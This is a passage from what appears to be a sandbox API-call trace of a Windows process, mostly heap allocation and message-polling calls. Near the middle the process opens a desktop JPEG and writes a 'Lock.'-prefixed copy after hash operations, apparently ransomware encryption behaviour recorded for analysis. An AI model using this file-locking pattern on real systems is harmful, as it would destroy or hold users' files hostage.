hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0128.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0128.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0128.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0128.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0128.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0128.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0128.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0128.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0128.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0128.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0128.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0128.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0128.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0128.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0128.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.525] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0128.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0128.526] CryptDestroyHash (hHash=0xa87490) returned 1 [0128.526] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/-2dSSUPd3c99IL5ta.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\-2dssupd3c99il5ta.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0128.527] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.527] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ecd0 | out: hHeap=0x970000) returned 1 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0128.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0128.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0128.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0128.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0128.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0128.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0128.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0128.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0128.528] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0128.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0128.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0128.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0128.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e90338 [0128.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0128.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0128.529] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.-2dSSUPd3c99IL5ta.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.-2dssupd3c99il5ta.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0128.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0128.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b18 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ebb0 | out: hHeap=0x970000) returned 1 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0128.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0128.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0128.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0128.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0128.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0128.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0128.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0128.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3be3020 [0128.549] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0128.550] ReadFile (in: hFile=0x2a0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0xf8fc, lpOverlapped=0x0) returned 1 [0128.553] ReadFile (in: hFile=0x2a0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0128.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0128.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0128.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0128.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2ea0340 [0128.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be3020 | out: hHeap=0x970000) returned 1 [0128.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0128.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0128.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0128.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee70 | out: hHeap=0x970000) returned 1 [0128.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0128.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2eafc48 [0128.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0340 | out: hHeap=0x970000) returned 1 [0128.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.560] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0128.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0128.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0128.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0128.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0128.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2ea0340 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0340 | out: hHeap=0x970000) returned 1 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0128.562] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0128.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 